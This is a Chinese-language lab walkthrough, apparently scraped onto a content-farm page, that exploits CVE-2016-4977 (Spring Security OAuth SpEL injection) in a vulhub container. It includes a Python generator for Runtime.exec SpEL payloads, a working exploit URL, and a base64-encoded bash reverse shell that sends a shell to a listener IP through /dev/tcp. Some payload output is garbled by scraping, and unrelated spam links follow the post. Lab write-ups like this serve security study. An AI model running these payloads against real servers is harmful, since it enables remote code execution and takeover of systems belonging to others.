当前位置: 首页 > news >正文

网站做引流竞价推广专员

网站做引流,竞价推广专员,河北软件开发网站建设,阿里云域名注册平台文章目录 一、搭建环境二、漏洞验证三、准备payload四、执行payload五、变形payload 一、搭建环境 cd vulhub/spring/CVE-2016-4977/ docker-compose up -d 二、漏洞验证 访问 http://192.168.10.171:8080/oauth/authorize?response_type${233*233}&client_idacme&s…

文章目录

  • 一、搭建环境
  • 二、漏洞验证
  • 三、准备payload
    • 四、执行payload
    • 五、变形payload

一、搭建环境

cd vulhub/spring/CVE-2016-4977/
docker-compose up -d

在这里插入图片描述在这里插入图片描述

二、漏洞验证

访问
http://192.168.10.171:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test
用admin:admin登陆
在这里插入图片描述

出现以下报错,表示漏洞存在(response_type里面的命令执行了)
在这里插入图片描述

三、准备payload

poc.py
#!/usr/bin/env python
message = input(‘Enter message to encode:’)
poc = ‘${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)’ % ord(message[0])
for ch in message[1:]:
poc += ‘.concat(T(java.lang.Character).toString(%s))’ % ord(ch)
poc += ‘)}’
print(poc)

python3 poc.py #输入要执行的命令,会返回处理后的命令,这里输入whoami
在这里插入图片描述

取出得到的输出
T ( j a v a . l a n g . R u n t i m e ) . g e t R u n t i m e ( ) . e x e c ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 119 ) . c o n c a t ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 104 ) ) . c o n c a t ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 111 ) ) . c o n c a t ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 97 ) ) . c o n c a t ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 109 ) ) . c o n c a t ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 105 ) ) ) P a y l o a d : o a u t h / a u t h o r i z e ? r e s p o n s e t y p e = {T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105)))} Payload:oauth/authorize?response_type= T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105)))Payload:oauth/authorize?responsetype={T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105)))}&client_id=acme&scope=openid&redirect_uri=http://test

四、执行payload

在这里插入图片描述

返回了进程,表示代码执行了,但这没有回显,是无回显RCE

五、变形payload

准备shell代码:bash -i >& /dev/tcp/192.168.155.2/1111 0>&1
转成base64:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ==
shell:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ==}|{base64,-d}|{bash,-i}
Python poc.y获取输出
在这里插入图片描述

将上面的命令加入到response_type参数部分,得到变形后的url
六、Getshell
开启监听
在这里插入图片描述

执行变形后的payload得到shell
在这里插入图片描述

http://www.yidumall.com/news/94695.html

相关文章:

  • 曲阜网站建设品牌管理
  • 美国做批发的网站有哪些高清视频网络服务器
  • 网站搭建设计中央常委成员名单
  • 二维码制作网站有哪些公司全网推广
  • 网站建设或网站优化排名2023年新冠疫情最新消息
  • 建湖专业做网站网站seo运营
  • 网站开发系统毕业综合实践报告网上做广告怎么收费
  • 有一个外国聊天网站 动画做的百色seo快速排名
  • 我做的网站搜不到计算机培训班有用吗
  • 如何查询网站被百度收录关键词排名的排名优化
  • 东莞网站没计怎么样优化网站seo
  • 专业网站建设服务公司哪家好企业内训课程
  • 企业管理培训课程方案优化营商环境 助推高质量发展
  • b2b网站推广的效果全球搜索引擎大全
  • 做网站怎么放视频海南seo
  • 上海网站建设-新闻动态seo入门教程视频
  • 柳州网站建设22杭州疫情最新情况
  • 做网站推广邢台国内做网站比较好的公司
  • 网站开发 模版绑定顶级域名手机百度搜索
  • 电子商务网站运营深圳互联网公司50强
  • 做竞猜网站合法吗常州网站优化
  • 网站红色模板百度快照推广排名
  • 做淘宝还是京东还是做网站央视网新闻
  • 国外企业网站案例网络营销是什么?
  • 做网站要下载的软件最新的疫情数据
  • 重庆网站备案流程长沙网站关键词推广
  • 河南网站建设问一问公司百度关键词推广怎么做
  • 手表网站排名大全网站排名优化公司
  • 网站 栏目管理贵州seo推广
  • 华资源网站建设十大免费软文推广平台